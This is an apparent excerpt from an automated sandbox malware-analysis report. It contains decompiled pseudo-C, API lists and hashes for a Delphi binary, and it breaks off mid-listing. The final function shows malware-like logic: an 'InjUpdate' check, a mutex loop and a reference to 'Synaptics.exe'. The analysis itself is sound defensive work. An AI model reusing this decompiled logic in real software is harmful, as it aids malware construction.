                                                      • Part of subcall function 0041AF14: RtlInitializeCriticalSection.KERNEL32(00418638,?,?,00422E79,00000000,00422E9D), ref: 0041AF33
                                                      • Part of subcall function 00445F34: SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                      • Part of subcall function 00445F34: GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                      • Part of subcall function 00445F34: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                      • Part of subcall function 00445F34: SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                      • Part of subcall function 00457FC8: GetKeyboardLayout.USER32 ref: 0045800D
                                                      • Part of subcall function 00457FC8: 733AAC50.USER32(00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                      • Part of subcall function 00457FC8: 733AAD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                      • Part of subcall function 00457FC8: 733AB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?), ref: 00458077
                                                      • Part of subcall function 004590AC: LoadIconA.USER32 ref: 00459191
                                                      • Part of subcall function 004590AC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                      • Part of subcall function 004590AC: OemToCharA.USER32 ref: 004591D6
                                                      • Part of subcall function 004590AC: CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000), ref: 00459216
                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                    • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                                    • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$h}C
                                                    • API String ID: 2159221912-974380857
                                                    • Opcode ID: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                    • Instruction ID: 9417c5a7fe2a4a4aad457f7fc52310e9237dc336e75d7247441188c808a0813e
                                                    • Opcode Fuzzy Hash: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                    • Instruction Fuzzy Hash: 5E4103B09042049BDB00EFB6EC45A5E77B5AF59308B11853BF505E73A2DB39B904CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004730FC Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 54%
                                                    			E004730FC(signed int __eax, void* __ebx, int __edx, void* __edi, void* __esi) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				char _v273;
				char _v280;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				signed int _t29;
				int _t59;
				int _t63;
				intOrPtr* _t81;
				signed int _t84;
				int _t91;
				intOrPtr _t93;
				intOrPtr _t100;
				intOrPtr* _t108;
				void* _t110;
				void* _t111;
				intOrPtr _t112;

				_t91 = __edx;
				_t29 = __eax;
				_t110 = _t111;
				_t112 = _t111 + 0xfffffed0;
				_v308 = 0;
				_v304 = 0;
				_v300 = 0;
				_v280 = 0;
				_t81 = __edx;
				_push(_t110);
				_push(0x473306);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t112;
				_t84 = __eax;
				if(__eax > 6) {
					L8:
					if(_t29 != 7) {
						SHGetSpecialFolderLocation(0, _t91,  &_v8); // executed
						SHGetPathFromIDList(_v8,  &_v273);
						E0040A174( &_v273, _t81);
					} else {
						_push(_t110);
						_push(0x4732a8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t112;
						E00472EF0( &_v280, _t81, _t84, 0);
						E00404DCC(_v280, 0x47331c);
						if(0 == 0) {
							SHGetSpecialFolderLocation(0, 5,  &_v8);
							SHGetPathFromIDList(_v8,  &_v273);
							E0040A174( &_v273,  &_v300);
							E00409D30(_v300, _t81);
							E00404CCC( &_v304, "\\Downloads",  *_t81);
							_t59 = E00409A58(_v304);
							__eflags = _t59;
							if(_t59 == 0) {
								E00404CCC( &_v308, 0x473390,  *_t81);
								_t63 = E00409A58(_v308);
								__eflags = _t63;
								if(_t63 == 0) {
									E004049C0(_t81);
								} else {
									E00404C88(_t81, 0x473390);
								}
							} else {
								E00404C88(_t81, "\\Downloads");
							}
						} else {
							_t108 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHGetKnownFolderPath");
							E00408CA8("{374DE290-123F-4565-9164-39C4925E467B}", _t81,  &_v296, _t108, 0);
							 *_t108( &_v296, 0, 0,  &_v12);
							E00404BE8(_t81, _v12);
						}
						_pop(_t100);
						 *[fs:eax] = _t100;
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(0x47330d);
					E004049E4( &_v308, 3);
					return E004049C0( &_v280);
				}
				switch( *((intOrPtr*)(__eax * 4 +  &M00473140))) {
					case 0:
						goto L8;
					case 1:
						_t91 = 0x1a;
						goto L8;
					case 2:
						__edx = 0x1c;
						goto L8;
					case 3:
						__edx = 0x23;
						goto L8;
					case 4:
						__edx = 0x2e;
						goto L8;
					case 5:
						__edx = 5;
						goto L8;
					case 6:
						__edx = 0;
						__eflags = 0;
						goto L8;
				}
			}























                                                    0x004730fc
                                                    0x004730fc
                                                    0x004730fd
                                                    0x004730ff
                                                    0x0047310a
                                                    0x00473110
                                                    0x00473116
                                                    0x0047311c
                                                    0x00473122
                                                    0x00473126
                                                    0x00473127
                                                    0x0047312c
                                                    0x0047312f
                                                    0x00473132
                                                    0x00473137
                                                    0x00473181
                                                    0x00473184
                                                    0x004732bb
                                                    0x004732cb
                                                    0x004732d8
                                                    0x0047318a
                                                    0x0047318c
                                                    0x0047318d
                                                    0x00473192
                                                    0x00473195
                                                    0x0047319e
                                                    0x004731ae
                                                    0x004731b3
                                                    0x00473206
                                                    0x00473216
                                                    0x00473227
                                                    0x00473234
                                                    0x00473246
                                                    0x00473251
                                                    0x00473256
                                                    0x00473258
                                                    0x00473275
                                                    0x00473280
                                                    0x00473285
                                                    0x00473287
                                                    0x00473299
                                                    0x00473289
                                                    0x00473290
                                                    0x00473290
                                                    0x0047325a
                                                    0x00473261
                                                    0x00473261
                                                    0x004731b5
                                                    0x004731cc
                                                    0x004731e1
                                                    0x004731ed
                                                    0x004731f4
                                                    0x004731f4
                                                    0x004732a0
                                                    0x004732a3
                                                    0x004732a3
                                                    0x004732df
                                                    0x004732e2
                                                    0x004732e5
                                                    0x004732f5
                                                    0x00473305
                                                    0x00473305
                                                    0x00473139
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0047315c
                                                    0x00000000
                                                    0x00000000
                                                    0x00473163
                                                    0x00000000
                                                    0x00000000
                                                    0x0047316a
                                                    0x00000000
                                                    0x00000000
                                                    0x00473171
                                                    0x00000000
                                                    0x00000000
                                                    0x00473178
                                                    0x00000000
                                                    0x00000000
                                                    0x0047317f
                                                    0x0047317f
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(shell32.dll,00000000,004732A8,?,00000000,00473306), ref: 004731BA
                                                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004731C7
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00473206
                                                    • SHGetPathFromIDList.SHELL32(?,?), ref: 00473216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressFolderFromLibraryListLoadLocationPathProcSpecial
                                                    • String ID: SHGetKnownFolderPath$\Downloads$shell32.dll${374DE290-123F-4565-9164-39C4925E467B}
                                                    • API String ID: 2341558874-1676591009
                                                    • Opcode ID: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                    • Instruction ID: 6a38066a99e998b0feb9dfcd70d0f28be743192f9ebabe66a089855190f33de3
                                                    • Opcode Fuzzy Hash: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                    • Instruction Fuzzy Hash: 9741C970B04118ABD720EF65DC42BDE73B9EB48705F5084BBB90CA7681DA3C9F419A1E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043E6BC Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 134registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 300 43e6bc-43e6f3 302 43e6f5-43e6fc 300->302 303 43e768-43e78d GetClassInfoA 300->303 302->303 306 43e6fe-43e703 302->306 304 43e78f-43e79a 303->304 305 43e79c-43e79e 303->305 304->305 307 43e7cd-43e7ea call 43e88c 304->307 308 43e7a0-43e7a8 UnregisterClassA 305->308 309 43e7ad-43e7c6 RegisterClassA 305->309 310 43e705-43e709 306->310 311 43e728-43e763 call 406a70 call 40d180 call 404378 306->311 319 43e7f1-43e804 GetWindowLongA 307->319 320 43e7ec call 40e79c 307->320 308->309 309->307 314 43e7c8 call 40e79c 309->314 310->311 313 43e70b-43e71a call 403d78 310->313 311->303 313->311 323 43e71c-43e726 call 441704 313->323 314->307 325 43e827-43e84e call 40a1d4 call 441a14 call 424e24 call 43c130 319->325 326 43e806-43e816 GetWindowLongA 319->326 320->319 323->303 339 43e853-43e857 325->339 326->325 329 43e818-43e822 SetWindowLongA 326->329 329->325 340 43e864-43e87c call 4049c0 339->340 341 43e859-43e85f call 403de8 339->341 341->340
                                                    C-Code - Quality: 84%
                                                    			E0043E6BC(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x43e87d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E00437D70 != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00437D70;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040E79C(_t94, _t95, _t109, _t111);
						}
					}
					 *0x49bc20 = _t111;
					_t96 =  *_t111; // executed
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E0040E79C(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					E0040A1D4( *((intOrPtr*)(_t111 + 0x64)));
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					E00441A14(_t111);
					E0043C130(_t111, E00424E24( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1); // executed
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						E00403DE8(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x43e884);
					return E004049C0( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x49dc4c; // 0x422f30
						E00406A70(_t86,  &_v196);
						_t95 = _v196;
						E0040D180(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E00404378();
					} else {
						_t108 =  *0x437498; // 0x4374e4
						if(E00403D78(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E00441704(_t94);
					}
					goto L7;
				}
			}




















                                                    0x0043e6bc
                                                    0x0043e6bc
                                                    0x0043e6c5
                                                    0x0043e6c9
                                                    0x0043e6cf
                                                    0x0043e6d3
                                                    0x0043e6d4
                                                    0x0043e6d9
                                                    0x0043e6dc
                                                    0x0043e6e7
                                                    0x0043e6e9
                                                    0x0043e6f3
                                                    0x0043e768
                                                    0x0043e76b
                                                    0x0043e780
                                                    0x0043e788
                                                    0x0043e78a
                                                    0x0043e78d
                                                    0x0043e79e
                                                    0x0043e7a8
                                                    0x0043e7a8
                                                    0x0043e7ad
                                                    0x0043e7b7
                                                    0x0043e7c6
                                                    0x0043e7c8
                                                    0x0043e7c8
                                                    0x0043e7c6
                                                    0x0043e7cd
                                                    0x0043e7db
                                                    0x0043e7dd
                                                    0x0043e7ea
                                                    0x0043e7ec
                                                    0x0043e7ec
                                                    0x0043e804
                                                    0x0043e822
                                                    0x0043e822
                                                    0x0043e82a
                                                    0x0043e831
                                                    0x0043e836
                                                    0x0043e84e
                                                    0x0043e853
                                                    0x0043e857
                                                    0x0043e85f
                                                    0x0043e85f
                                                    0x0043e866
                                                    0x0043e869
                                                    0x0043e86c
                                                    0x0043e87c
                                                    0x0043e6fe
                                                    0x0043e6fe
                                                    0x0043e703
                                                    0x0043e728
                                                    0x0043e72b
                                                    0x0043e731
                                                    0x0043e747
                                                    0x0043e74c
                                                    0x0043e751
                                                    0x0043e75e
                                                    0x0043e763
                                                    0x0043e70b
                                                    0x0043e70d
                                                    0x0043e71a
                                                    0x00000000
                                                    0x00000000
                                                    0x0043e723
                                                    0x0043e723
                                                    0x00000000
                                                    0x0043e703

                                                    APIs
                                                    • GetClassInfoA.USER32 ref: 0043E780
                                                    • UnregisterClassA.USER32 ref: 0043E7A8
                                                    • RegisterClassA.USER32 ref: 0043E7BE
                                                    • GetWindowLongA.USER32 ref: 0043E7FA
                                                    • GetWindowLongA.USER32 ref: 0043E80F
                                                    • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0043E822
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClassLongWindow$InfoRegisterUnregister
                                                    • String ID: 0/B$@$tC
                                                    • API String ID: 717780171-775952512
                                                    • Opcode ID: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                    • Instruction ID: ef2cd423dbe362dacdbee8c2275ea56bb610ff0c2a9daaab76c1ee9f024234ac
                                                    • Opcode Fuzzy Hash: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                    • Instruction Fuzzy Hash: 90518E70A013549BEB20EB6ACC41B9A77F9AF09308F10457EE845E73D2DB38AD45CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401B60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 361 401b60-401b6b 362 401b71-401b86 361->362 363 401c3d-401c3f 361->363 364 401b92-401bb1 LocalFree 362->364 365 401b88-401b8d RtlEnterCriticalSection 362->365 366 401bc5-401bcb 364->366 365->364 367 401bb3-401bc3 VirtualFree 366->367 368 401bcd-401bf2 call 401460 * 3 366->368 367->366 375 401bf4-401c09 LocalFree 368->375 376 401c0b-401c1f 368->376 375->375 375->376 378 401c21-401c26 RtlLeaveCriticalSection 376->378 379 401c2b-401c35 RtlDeleteCriticalSection 376->379 378->379
                                                    C-Code - Quality: 72%
                                                    			E00401B60() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x49e5c4 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401C36);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x49e04d != 0) {
						_push(0x49e5cc);
						L004013F8();
					}
					 *0x49e5c4 = 0;
					_t3 =  *0x49e624; // 0x0
					LocalFree(_t3);
					 *0x49e624 = 0;
					_t19 =  *0x49e5ec; // 0x49e5ec
					while(_t19 != 0x49e5ec) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000); // executed
						_t19 =  *_t19;
					}
					E00401460(0x49e5ec);
					E00401460(0x49e5fc);
					E00401460(0x49e628);
					_t14 =  *0x49e5e4; // 0x0
					while(_t14 != 0) {
						 *0x49e5e4 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x49e5e4; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c3d);
					if( *0x49e04d != 0) {
						_push(0x49e5cc);
						L00401400();
					}
					_push(0x49e5cc);
					L00401408();
					return 0;
				}
			}










                                                    0x00401b61
                                                    0x00401b6b
                                                    0x00401c3f
                                                    0x00401b71
                                                    0x00401b73
                                                    0x00401b74
                                                    0x00401b79
                                                    0x00401b7c
                                                    0x00401b86
                                                    0x00401b88
                                                    0x00401b8d
                                                    0x00401b8d
                                                    0x00401b92
                                                    0x00401b99
                                                    0x00401b9f
                                                    0x00401ba6
                                                    0x00401bab
                                                    0x00401bc5
                                                    0x00401bba
                                                    0x00401bbe
                                                    0x00401bc3
                                                    0x00401bc3
                                                    0x00401bd2
                                                    0x00401bdc
                                                    0x00401be6
                                                    0x00401beb
                                                    0x00401bf2
                                                    0x00401bf6
                                                    0x00401bfd
                                                    0x00401c02
                                                    0x00401c07
                                                    0x00401c0d
                                                    0x00401c10
                                                    0x00401c13
                                                    0x00401c1f
                                                    0x00401c21
                                                    0x00401c26
                                                    0x00401c26
                                                    0x00401c2b
                                                    0x00401c30
                                                    0x00401c35
                                                    0x00401c35

                                                    APIs
                                                    • RtlEnterCriticalSection.KERNEL32(Function_0009E5CC,00000000,00401C36), ref: 00401B8D
                                                    • LocalFree.KERNEL32(00000000,00000000,00401C36), ref: 00401B9F
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BBE
                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BFD
                                                    • RtlLeaveCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C26
                                                    • RtlDeleteCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C30
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                    • String ID: (I$I
                                                    • API String ID: 3782394904-2351459270
                                                    • Opcode ID: 9f8810575637edab4c47e499dd9e800e95505fd11f6ffcb64adb6a0ff56ad0c0
                                                    • Instruction ID: 63aebc4cd3b04fdf267fff4595653c8a60232739778a968a80e4263db5fe1b04
                                                    • Opcode Fuzzy Hash: 9f8810575637edab4c47e499dd9e800e95505fd11f6ffcb64adb6a0ff56ad0c0
                                                    • Instruction Fuzzy Hash: D111AC706042407EEB21EBA79D55B163BD8A71571CF91407BF004A62F2E67CAC00CB2E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0049A3E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 163COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 51%
                                                    			E0049A3E0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;
				char _t33;
				intOrPtr _t38;
				void* _t39;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t62;
				intOrPtr _t69;
				intOrPtr _t73;
				void* _t83;
				void* _t86;
				intOrPtr _t92;
				void* _t97;
				void* _t98;
				intOrPtr _t103;
				intOrPtr _t127;

				_t137 = __fp0;
				_t124 = __esi;
				_t123 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t92 = __eax;
				_push(_t127);
				_push(0x49a5ef);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				if(__edx == 0) {
					E004967D4(__eax, __eax, "ControlCenter -> Pasif");
					__eflags = 0;
					E0049A098(_t92, _t92, 0, 0, __edi, __esi, __fp0, 0, 0, 0, 0, 0);
					L14:
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(0x49a5f6);
					return E004049E4( &_v20, 4);
				}
				E004967D4(__eax, __eax, "ControlCenter -> Aktif");
				if( *((intOrPtr*)(_t92 + 0x308)) == 0) {
					 *((intOrPtr*)(_t92 + 0x308)) = E0045C064(_t92, 1);
				}
				_t27 =  *((intOrPtr*)(_t92 + 0x308));
				 *((intOrPtr*)(_t27 + 0x44)) = _t92;
				 *((intOrPtr*)(_t27 + 0x40)) = 0x49a668;
				_t29 = E004738BC(0, _t92); // executed
				_t31 = E00441704(_t92);
				_t32 =  *0x49d6b8; // 0x0
				_t97 = _t29; // executed
				_t33 = E00477AD8(_t32, _t92, _t31, _t123, _t124); // executed
				 *0x49f149 = _t33;
				E00402B68(1,  &_v8);
				E00404DCC(_v8, "InjUpdate");
				if(0 != 0) {
					L8:
					_t38 =  *0x49d6b4; // 0x0, executed
					_t39 = E0047423C(_t38, _t92, 1, _t124, _t133); // executed
					if(_t39 != 0) {
						E0045A800();
					} else {
						E00498684(_t92, _t92, _t123, _t124); // executed
						E00498F04(_t92, _t123, _t124); // executed
						_t48 = E00498B40(_t92, _t92, _t123, _t124); // executed
						if(_t48 == 0) {
							_t49 =  *0x49f1b0; // 0x0
							_push(E00409780(_t49, _t97, 1, __eflags));
							_t51 =  *0x49f1b4; // 0x0
							_push(E00409780(_t51, _t97, 1, __eflags));
							_t53 =  *0x49f1b8; // 0x0
							_push(E00409780(_t53, _t97, 1, __eflags));
							_t55 =  *0x49f1bc; // 0x0
							_push(E00409780(_t55, _t97, 1, __eflags));
							_t57 =  *0x49f1c0; // 0x0
							_push(E00409780(_t57, _t97, 1, __eflags));
							_t59 =  *0x49f1a8; // 0x0
							_push(E00409780(_t59, _t97, 1, __eflags));
							_t61 =  *0x49f1a4; // 0x0
							_t62 = E00409780(_t61, _t97, 1, __eflags);
							_pop(_t98);
							E0049A098(_t92, _t92, _t98, _t62, _t123, _t124, _t137);
							E00499FAC(_t92, 1);
						} else {
							E00498998(_t92, _t92, 1, _t123, _t124); // executed
						}
					}
					goto L14;
				}
				_t69 =  *0x49d6b4; // 0x0
				_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t69));
				_t131 = _t124;
				if(_t124 == 0) {
					goto L8;
				} else {
					goto L5;
				}
				do {
					L5:
					CloseHandle(_t124);
					_t73 =  *0x49d6b4; // 0x0
					_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t73));
					E004737B0( &_v12);
					_push( &_v12);
					E00402B68(0,  &_v20);
					E00409E18(_v20,  &_v16);
					_pop(_t83);
					E00404C88(_t83, _v16);
					_t86 = E00409A48(_v12, _t131);
					_t132 = _t86;
					if(_t86 != 0) {
						E00475A94("Synaptics.exe", _t92, _t123, _t124, _t132);
					}
					_t133 = _t124;
				} while (_t124 != 0);
				goto L8;
			}
































                                                    0x0049a3e0
                                                    0x0049a3e0
                                                    0x0049a3e0
                                                    0x0049a3e5
                                                    0x0049a3e6
                                                    0x0049a3e7
                                                    0x0049a3e8
                                                    0x0049a3e9
                                                    0x0049a3ea
                                                    0x0049a3eb
                                                    0x0049a3ef
                                                    0x0049a3f0
                                                    0x0049a3f5
                                                    0x0049a3f8
                                                    0x0049a3fd
                                                    0x0049a5ba
                                                    0x0049a5cb
                                                    0x0049a5cf
                                                    0x0049a5d4
                                                    0x0049a5d6
                                                    0x0049a5d9
                                                    0x0049a5dc
                                                    0x0049a5ee
                                                    0x0049a5ee
                                                    0x0049a40a
                                                    0x0049a416
                                                    0x0049a426
                                                    0x0049a426
                                                    0x0049a42c
                                                    0x0049a432
                                                    0x0049a435
                                                    0x0049a43e
                                                    0x0049a446
                                                    0x0049a44d
                                                    0x0049a452
                                                    0x0049a453
                                                    0x0049a458
                                                    0x0049a465
                                                    0x0049a472
                                                    0x0049a477
                                                    0x0049a4fd
                                                    0x0049a4ff
                                                    0x0049a504
                                                    0x0049a50b
                                                    0x0049a5ac
                                                    0x0049a511
                                                    0x0049a513
                                                    0x0049a51a
                                                    0x0049a521
                                                    0x0049a528
                                                    0x0049a538
                                                    0x0049a542
                                                    0x0049a545
                                                    0x0049a54f
                                                    0x0049a552
                                                    0x0049a55c
                                                    0x0049a55f
                                                    0x0049a569
                                                    0x0049a56c
                                                    0x0049a576
                                                    0x0049a579
                                                    0x0049a583
                                                    0x0049a586
                                                    0x0049a58b
                                                    0x0049a594
                                                    0x0049a595
                                                    0x0049a59e
                                                    0x0049a52a
                                                    0x0049a52c
                                                    0x0049a52c
                                                    0x0049a528
                                                    0x00000000
                                                    0x0049a50b
                                                    0x0049a47d
                                                    0x0049a494
                                                    0x0049a496
